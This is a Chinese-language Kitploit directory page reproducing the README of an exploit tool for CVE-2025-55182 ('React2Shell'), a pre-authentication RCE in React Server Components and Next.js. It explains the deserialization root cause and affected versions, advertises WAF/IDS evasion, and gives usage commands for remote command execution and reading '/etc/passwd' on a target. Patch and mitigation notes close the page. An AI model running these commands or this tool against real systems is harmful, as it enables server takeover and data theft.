Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182 — 针对 React Server Components 的 CVE-2025-55182(React2Shell)预认证RCE漏洞利用。功能包括扫描、OAST验证、WAF绕过、命令执行和文件读取。 | Kitploit
工具/GitHubGitHub/sentinelxofficial/cve-2025-55182
侦察漏洞分析漏洞利用IDS/IPS规避Web应用程序漏洞利用WAF绕过渗透测试Payload 开发
GitHubsentinelxofficial/cve-2025-55182

CVE-2025-55182

针对 React Server Components 的 CVE-2025-55182(React2Shell)预认证RCE漏洞利用。功能包括扫描、OAST验证、WAF绕过、命令执行和文件读取。

查看仓库
1183个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-55182 — React2Shell

预认证远程代码执行漏洞,影响 React Server Components (RSC)、Next.js 及相关框架。

CVE CVSS Type Author


概述

CVE-2025-55182(又称 React2Shell)是一个影响 React Server Components (RSC) 生态系统的严重预认证 RCE 漏洞。未认证的攻击者只需发送一个精心构造的 HTTP POST 请求即可完全攻陷易受攻击的服务器。

技术分析

根因

React Server Components 使用一种名为 React Flight 的自定义线格式来序列化函数引用和模块调用。该漏洞存在于处理发往 RSC 端点的 POST 请求的载荷解码机制中。

当服务器接收到 React Flight 载荷时,它会在缺少充分验证的情况下反序列化内容,信任攻击者控制的 $$typeof 字段和模块引用解析。这使得攻击者能够:

  1. 引用任意 Node.js 内置模块(例如 child_process、fs、net)
  2. 通过 $F(函数)类型标记链式调用函数
  3. 在 Node.js 服务器运行时环境下执行任意代码

受影响版本

组件包受影响版本已修复版本
react-server-dom-webpack19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-parcel19.0.0 – 19.2.0≥ 19.2.1
react-server-dom-turbopack19.0.0 – 19.2.0≥ 19.2.1
next (13.x)13.3.0 – 13.5.x≥ 14.2.35
next (14.x)14.0.0 – 14.2.34≥ 14.2.35
next (15.x)15.0.0+ (详见补丁)已修复版本

CVSS


CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical


功能

  • 扫描 – 检测易受攻击的 RSC 端点并识别 Next.js/React 版本。
  • 验证 (OAST) – 发送带外交互载荷,通过 DNS/HTTP 回调确认 RCE。
  • 绕过 – 全面的 WAF/IDS 规避:内容类型变异、载荷编码、标头伪造、路径变体及 WAF 载荷。
  • 执行 – 在目标上运行任意系统命令(例如 id、whoami)。
  • 读取 – 从服务器读取任意文件(例如 /etc/passwd、package.json)。
  • JSON 输出 – 机器可读的结果,便于集成。

安装

git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt

使用

基本扫描

python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json

通过 OAST 验证 RCE

python3 poc.py -t https://target.com -m verify --oast your.oast.domain

全功能绕过测试

python3 poc.py -t https://target.com -m bypass --verbose

执行命令

python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20

读取文件

python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"

使用代理(例如 Burp Suite)

python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080

文件结构

CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
    ├── __init__.py
    ├── payloads.py
    ├── scanner.py
    ├── bypass.py
    └── rce.py

缓解措施

补丁(推荐)

npm install [email protected]
npm install [email protected] [email protected]

临时解决方案

· 禁用服务器函数("use server") · WAF 规则阻止 Content-Type: text/x-component · 对 RSC 端点进行网络隔离


参考资料

· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182


免责声明:仅用于授权安全测试。

作者:SentinelX · https://t.me/SentinelXsecurity

下载工具